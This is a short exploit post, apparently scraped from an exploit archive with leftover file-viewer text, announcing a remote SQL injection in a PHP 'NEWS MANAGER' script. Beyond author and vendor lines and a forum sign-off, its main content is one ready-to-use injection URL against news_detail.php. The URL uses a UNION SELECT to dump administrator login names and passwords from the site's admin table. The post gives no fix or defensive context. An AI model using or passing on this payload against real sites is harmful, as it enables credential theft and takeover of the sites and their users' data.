20 lines
No EOL
391 B
Text
20 lines
No EOL
391 B
Text
# NEWS MANAGER (nid) Remote SQL Injection Vulnerability
|
|
|
|
# Author: Hussin X
|
|
# Home : www.iq-ty.com<http://www.iq-ty.com>
|
|
# email: darkangel_g85[at]Yahoo[DoT]com
|
|
|
|
|
|
|
|
#
|
|
# Vendor : http://www.preprojects.com/news.asp
|
|
|
|
Exploit:
|
|
|
|
|
|
server/Script/news_detail.php?nid=-136+union+select+1,2,concat_ws(0x3a,login,password),4,5,6,7+from+admin--
|
|
|
|
|
|
end
|
|
|
|
IQ-SecuritY FoRuM |